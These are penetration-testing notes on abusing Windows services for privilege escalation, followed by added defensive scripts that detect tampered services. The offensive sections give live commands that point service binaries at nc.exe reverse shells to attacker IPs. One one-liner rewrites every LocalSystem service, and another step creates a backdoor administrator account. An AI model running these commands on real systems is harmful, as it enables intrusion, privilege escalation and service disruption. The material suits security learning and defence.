Abusing Services

Powershell

Below is an example of how to abuse the Windows Update Service (wuauserv) by rewriting its ImagePath in the registry.

# Show all services
Get-Service

# Show details of the services
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\*

# Shows details about the specific service
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\services\wuauserv

DependOnService     : {rpcss}
Description         : @%systemroot%\system32\wuaueng.dll,-106
DisplayName         : @%systemroot%\system32\wuaueng.dll,-105
ErrorControl        : 1
FailureActions      : {128, 81, 1, 0...}
ImagePath           : C:\Windows\system32\svchost.exe -k netsvcs -p
ObjectName          : LocalSystem
RequiredPrivileges  : {SeAuditPrivilege, SeCreateGlobalPrivilege, SeCreatePageFilePrivilege, SeTcbPrivilege...}
ServiceSidType      : 1
Start               : 3
SvcMemHardLimitInMB : 246
SvcMemMidLimitInMB  : 167
SvcMemSoftLimitInMB : 88
Type                : 32
PSPath              : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wuauserv
PSParentPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
PSChildName         : wuauserv
PSDrive             : HKLM
PSProvider          : Microsoft.PowerShell.Core\Registry

# Sets a property on the service (here the binary the service runs)
Set-ItemProperty -Path 'HKLM:\system\currentcontrolset\services\wuauserv' -Name 'ImagePath' -Value 'c:\temp\nc.exe 10.10.14.23 9001 -e powershell.exe'

Powershell Services Commands

Get all the details about a service. Useful to check whether you can stop, start or pause it (the CanStop, CanPauseAndContinue and similar properties).

get-service UsoSvc | Select-Object *
get-service wuauserv | select Displayname,Status,ServiceName,Can*
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\* | Select-Object DisplayName, PSChildName, ImagePath

Controlling the services

# Starts
Start-Service wuauserv

# Restarts
Restart-Service wuauserv

# Stops the service
Stop-Service wuauserv

# Script: rewrite the ImagePath of every service that runs as LocalSystem
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\* | ?{$_.ObjectName -like "LocalSystem"} | Select PSChildName,ImagePath | ForEach-Object {$srvname=$_.PSChildName;Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\$srvname" -Name ImagePath -Value 'C:\tmp\nc.exe 10.10.16.28 4444 -e powershell.exe'}
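The same registry data that the commands above read and rewrite is what a defender audits. The script below is an added example for this page, not code from the original notes: it extracts the executable from each service's ImagePath and flags entries whose binary sits outside SystemRoot or Program Files, unquoted paths with spaces, IP-and-port arguments like the nc.exe payload above, and LocalSystem binaries that ordinary users can overwrite. Get-ServiceExecutable, Test-ServiceImagePath and Find-SuspiciousService are hypothetical helper names, and the sample entries at the end are constructed.

```powershell
# Added example, not part of the original notes. The function names are assumed
# helpers written for this page, not built-in cmdlets.

# Pull the executable out of an ImagePath / binPath string. Handles quoted
# paths, unquoted paths that contain spaces, and svchost "-k group" hosts.
function Get-ServiceExecutable {
    param([Parameter(Mandatory)][string]$ImagePath)
    $expanded = [Environment]::ExpandEnvironmentVariables($ImagePath.Trim())
    $expanded = $expanded -replace '^\\\?\?\\', ''      # drop the \??\ prefix drivers use
    if ($expanded.StartsWith('"')) { return $expanded.Split('"')[1] }
    $tokens = $expanded -split ' '
    $acc = ''
    foreach ($t in $tokens) {
        $acc = if ($acc) { "$acc $t" } else { $t }
        if ($acc -match '\.(exe|sys|dll)$') { return $acc }  # first token run ending in a binary
    }
    return $tokens[0]
}

# Heuristics for one service entry; returns the reasons it looks tampered with.
function Test-ServiceImagePath {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$ImagePath,
        [string]$ObjectName = ''
    )
    $reasons = @()
    $exe = Get-ServiceExecutable -ImagePath $ImagePath

    # 1. Binary outside the directories Windows and vendors install services to
    $trusted = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
        Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }
    $inTrusted = @($trusted | Where-Object { $exe.StartsWith($_, [StringComparison]::OrdinalIgnoreCase) }).Count -gt 0
    if (-not $inTrusted) { $reasons += "binary outside SystemRoot/Program Files: $exe" }

    # 2. Unquoted path with spaces: the loader tries C:\Program.exe and so on first
    if (-not $ImagePath.Trim().StartsWith('"') -and $exe.Contains(' ')) {
        $reasons += 'unquoted ImagePath containing spaces'
    }

    # 3. Arguments that look like "<ip> <port>", as in the nc.exe payload above
    if ($ImagePath -match '\b\d{1,3}(\.\d{1,3}){3}\s+\d{2,5}\b') {
        $reasons += 'ImagePath carries an IP address and port'
    }

    # 4. LocalSystem service whose binary low-privileged users may overwrite
    if ($ObjectName -eq 'LocalSystem' -and (Test-Path -LiteralPath $exe)) {
        $weak = (Get-Acl -LiteralPath $exe).Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            "$($_.IdentityReference)" -match 'Users$|Everyone|INTERACTIVE' -and
            "$($_.FileSystemRights)" -match 'Write|Modify|FullControl'
        }
        if ($weak) { $reasons += 'LocalSystem binary writable by low-privileged users' }
    }
    return $reasons
}

# Run the heuristics over the live registry key the notes above read
function Find-SuspiciousService {
    Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\*' |
        Where-Object { $_.ImagePath } |
        ForEach-Object {
            $why = Test-ServiceImagePath -Name $_.PSChildName -ImagePath "$($_.ImagePath)" -ObjectName "$($_.ObjectName)"
            if ($why) {
                [pscustomobject]@{ Service = $_.PSChildName; Account = $_.ObjectName; Reasons = ($why -join '; '); ImagePath = $_.ImagePath }
            }
        }
}

# Constructed sample entries (the second is the tampered wuauserv from above)
$samples = @(
    @{ Name = 'wuauserv';   ImagePath = '%SystemRoot%\system32\svchost.exe -k netsvcs -p';         ObjectName = 'LocalSystem' },
    @{ Name = 'wuauserv';   ImagePath = 'c:\temp\nc.exe 10.10.14.23 9001 -e powershell.exe';       ObjectName = 'LocalSystem' },
    @{ Name = 'ExampleSvc'; ImagePath = 'C:\Program Files\Example App\svc.exe';                    ObjectName = 'LocalSystem' }
)
foreach ($s in $samples) {
    $why = Test-ServiceImagePath @s
    '{0,-11} {1}' -f $s.Name, $(if ($why) { $why -join '; ' } else { 'ok' })
}
```

The constructed samples at the bottom run without touching the system: the genuine svchost entry passes, the tampered one is flagged on two counts (binary outside the trusted directories, IP and port in the arguments) and the unquoted vendor path is reported separately. Run Find-SuspiciousService from an elevated prompt to apply the same checks to the live registry.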

Service Control

Example 1: Using the Service Control to abuse Universal Plug and Play Service

sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.47 9097 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost

# In the event of failure, make sure the dependency SSDPSRV is enabled and running first
sc config SSDPSRV start= auto
net start SSDPSRV

# Start the reverse shell with privileges
net start upnphost


1) Create a user and add it to the local administrators group
   net user wtf wtf123 /add
   net localgroup administrators wtf /add

2) Connect over RDP with that user
   rdesktop -u wtf 10.11.1.13

Example 2: Application Host Helper Service

sc query AppHostSvc
sc config AppHostSvc binpath= "c:\temp\nc.exe -e cmd 10.10.14.37 9002"
sc stop AppHostSvc
sc start AppHostSvc
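Both the Set-ItemProperty one-liner earlier and the sc config lines here change a service's binary path and logon account. The script below is an added example, not part of the original notes, that catches such changes by snapshotting Win32_Service configuration and diffing a later snapshot against it. Get-ServiceConfigSnapshot, Save-ServiceBaseline, Compare-ServiceConfig and Compare-ServiceBaseline are assumed names, the baseline file path is an assumption, and the before/after records at the end are constructed to mirror the upnphost change above.

```powershell
# Added example, not part of the original notes. Function names and the baseline
# file location are assumptions made for this page.

# PathName / StartName / StartMode are exactly what sc config binpath= / obj= /
# start= (and Set-ItemProperty on ImagePath / ObjectName / Start) modify.
function Get-ServiceConfigSnapshot {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        [pscustomobject]@{
            Name      = $_.Name
            PathName  = $_.PathName
            StartName = $_.StartName
            StartMode = $_.StartMode
        }
    }
}

function Save-ServiceBaseline {
    param([string]$Path = "$env:ProgramData\service-baseline.json")   # assumed location
    Get-ServiceConfigSnapshot | ConvertTo-Json -Depth 2 | Set-Content -LiteralPath $Path -Encoding UTF8
}

# Pure comparison, so it can be exercised offline on constructed records
function Compare-ServiceConfig {
    param(
        [Parameter(Mandatory)][object[]]$Baseline,
        [Parameter(Mandatory)][object[]]$Current
    )
    $old = @{}; foreach ($s in $Baseline) { $old[$s.Name] = $s }
    $new = @{}; foreach ($s in $Current)  { $new[$s.Name] = $s }

    foreach ($name in $new.Keys) {
        if (-not $old.ContainsKey($name)) {
            # sc create / New-Service since the baseline was taken
            [pscustomobject]@{ Service = $name; Change = 'added'; Before = ''; After = $new[$name].PathName }
            continue
        }
        foreach ($prop in 'PathName', 'StartName', 'StartMode') {
            if ("$($old[$name].$prop)" -ne "$($new[$name].$prop)") {
                [pscustomobject]@{ Service = $name; Change = $prop; Before = $old[$name].$prop; After = $new[$name].$prop }
            }
        }
    }
    foreach ($name in $old.Keys) {
        if (-not $new.ContainsKey($name)) {
            [pscustomobject]@{ Service = $name; Change = 'removed'; Before = $old[$name].PathName; After = '' }
        }
    }
}

function Compare-ServiceBaseline {
    param([string]$Path = "$env:ProgramData\service-baseline.json")
    $baseline = Get-Content -LiteralPath $Path -Raw | ConvertFrom-Json
    Compare-ServiceConfig -Baseline $baseline -Current (Get-ServiceConfigSnapshot)
}

# Constructed records: the same two services before and after the sc config
# lines above were run against upnphost (values are illustrative, not captured)
$before = @(
    [pscustomobject]@{ Name = 'upnphost';   PathName = 'C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p'; StartName = 'NT AUTHORITY\LocalService'; StartMode = 'Manual' },
    [pscustomobject]@{ Name = 'AppHostSvc'; PathName = 'C:\Windows\system32\svchost.exe -k apphost';                          StartName = 'LocalSystem';                StartMode = 'Auto' }
)
$after = @(
    [pscustomobject]@{ Name = 'upnphost';   PathName = 'C:\Inetpub\wwwroot\nc.exe 10.11.0.47 9097 -e C:\WINDOWS\System32\cmd.exe'; StartName = 'LocalSystem'; StartMode = 'Manual' },
    [pscustomobject]@{ Name = 'AppHostSvc'; PathName = 'C:\Windows\system32\svchost.exe -k apphost';                               StartName = 'LocalSystem'; StartMode = 'Auto' }
)
Compare-ServiceConfig -Baseline $before -Current $after | Format-Table -AutoSize
```

The constructed diff reports two rows for upnphost, a PathName change and a StartName change from LocalService to LocalSystem, which is precisely the binpath= and obj= edit above; AppHostSvc produces nothing because it did not change. On a real host, run Save-ServiceBaseline once from a known-good state and schedule Compare-ServiceBaseline; any row it prints that was not a deliberate install or update deserves a look.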

SC Commands

sc queryex type= service state= all

state= all: returns every service, running or stopped
state= inactive: returns only stopped services

To list only running services, omit the state= field:
sc queryex type= service
   commands:
          query           [qryOpt]  Show status
          queryEx         [qryOpt]  Show extended info - pid, flags
          GetDisplayName            Show the DisplayName
          GetKeyName                Show the ServiceKeyName
          EnumDepend                Show Dependencies
          qc                        Show config - dependencies, full path etc
          start                     START a service.
          stop                      STOP a service
          pause                     PAUSE a service.
          continue                  CONTINUE a service.
          create                    Create a service. (add it to the registry)
          config                    permanently change the service configuration
          delete                    Delete a service (from the registry)
          control                   Send a control to a service
          interrogate               Send an INTERROGATE control request to a service
          Qdescription              Query the description of a service
          description               Change the description of a service
          Qfailure                  Query the actions taken by a service upon failure
          failure                   Change the actions taken by a service upon failure
          sdShow                    Display a service's security descriptor using SDDL
          SdSet                     Sets a service's security descriptor using SDDL
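sdShow and SdSet, the last two commands in that list, are the hardening counterpart to everything on this page: sc config and Set-ItemProperty only succeed for principals the service's security descriptor allows to change its configuration. The script below is an added example, not part of the original notes. It parses the SDDL string that sc sdshow prints and reports allow ACEs that grant SERVICE_CHANGE_CONFIG (DC), WRITE_DAC (WD), WRITE_OWNER (WO) or generic write/all rights to Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE or similar low-privileged trustees. ConvertFrom-ServiceSddl, Find-WeakServiceAce and Find-WeakServiceDacl are hypothetical helper names; the two sample descriptors at the end are constructed.

```powershell
# Added example, not part of the original notes. Function names are assumed
# helpers written for this page.

# Service-object rights whose holder can tamper with the service definition
$DangerousRights = @{
    DC = 'SERVICE_CHANGE_CONFIG'   # what sc config binpath= / obj= needs
    WD = 'WRITE_DAC'               # what sc sdset needs
    WO = 'WRITE_OWNER'
    GA = 'GENERIC_ALL'
    GW = 'GENERIC_WRITE'
}
# SDDL trustee aliases / SIDs that any logged-on user satisfies
$LowPrivTrustees = @{
    WD = 'Everyone'; AU = 'Authenticated Users'; BU = 'BUILTIN\Users'
    IU = 'INTERACTIVE'; AN = 'ANONYMOUS'; BG = 'BUILTIN\Guests'; DU = 'Domain Users'
    'S-1-1-0' = 'Everyone'; 'S-1-5-11' = 'Authenticated Users'; 'S-1-5-32-545' = 'BUILTIN\Users'
}

# Split the DACL part of an SDDL string into ACE objects.
# ACE layout is (type;flags;rights;object_guid;inherit_guid;trustee); the
# S: section (SACL) that follows is ignored.
function ConvertFrom-ServiceSddl {
    param([Parameter(Mandatory)][string]$Sddl)
    $m = [regex]::Match($Sddl, 'D:[A-Z]*(?<aces>(?:\([^)]*\))*)')
    if (-not $m.Success) { return }
    foreach ($ace in [regex]::Matches($m.Groups['aces'].Value, '\(([^)]*)\)')) {
        $f = $ace.Groups[1].Value -split ';'
        if ($f.Count -lt 6) { continue }
        # rights are two-letter codes, or a raw hex mask in rare descriptors
        $rights = if ($f[2] -match '^0x') { @($f[2]) } else { [regex]::Matches($f[2], '..') | ForEach-Object { $_.Value } }
        [pscustomobject]@{
            Type    = $f[0]          # A = allow, D = deny
            Rights  = @($rights)
            Trustee = $f[5]
        }
    }
}

# Report allow ACEs that hand a dangerous right to a low-privileged trustee
function Find-WeakServiceAce {
    param([Parameter(Mandatory)][string]$Service, [Parameter(Mandatory)][string]$Sddl)
    foreach ($ace in ConvertFrom-ServiceSddl -Sddl $Sddl) {
        if ($ace.Type -ne 'A') { continue }
        if (-not $LowPrivTrustees.ContainsKey($ace.Trustee)) { continue }
        $bad = @($ace.Rights | Where-Object { $DangerousRights.ContainsKey($_) })
        if ($bad.Count -gt 0) {
            [pscustomobject]@{
                Service = $Service
                Trustee = $LowPrivTrustees[$ace.Trustee]
                Rights  = ($bad | ForEach-Object { $DangerousRights[$_] }) -join ','
            }
        }
    }
}

# Live scan: the same "sc sdshow" from the command list above, for every service
function Find-WeakServiceDacl {
    foreach ($svc in Get-Service) {
        $out = ((& sc.exe sdshow $svc.ServiceName 2>$null) -join '').Trim()
        if ($out -match '^D:') { Find-WeakServiceAce -Service $svc.ServiceName -Sddl $out }
    }
}

# Constructed samples: a default-looking descriptor, and one where Authenticated
# Users were additionally granted DC (change config) and RP/WP (start/stop)
$samples = @{
    hardened = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
    weak     = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPLOCRRC;;;AU)'
}
foreach ($name in $samples.Keys) {
    $hits = @(Find-WeakServiceAce -Service $name -Sddl $samples[$name])
    if ($hits.Count -gt 0) { $hits | Format-Table -AutoSize } else { "${name}: no weak ACEs" }
}
```

The "hardened" sample yields nothing because only SYSTEM and Administrators (SY, BA) hold DC, and the SACL entry for Everyone is audit-only. The "weak" sample reports Authenticated Users with SERVICE_CHANGE_CONFIG, which is exactly the permission the sc config examples on this page rely on. Note that WD means WRITE_DAC in the rights field but Everyone in the trustee field; the parser keeps them apart by position. Find-WeakServiceDacl runs the check across all services and only reports descriptors it was allowed to read; the remediation for a hit is to remove that ACE, for instance with sc sdset and the corrected descriptor.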
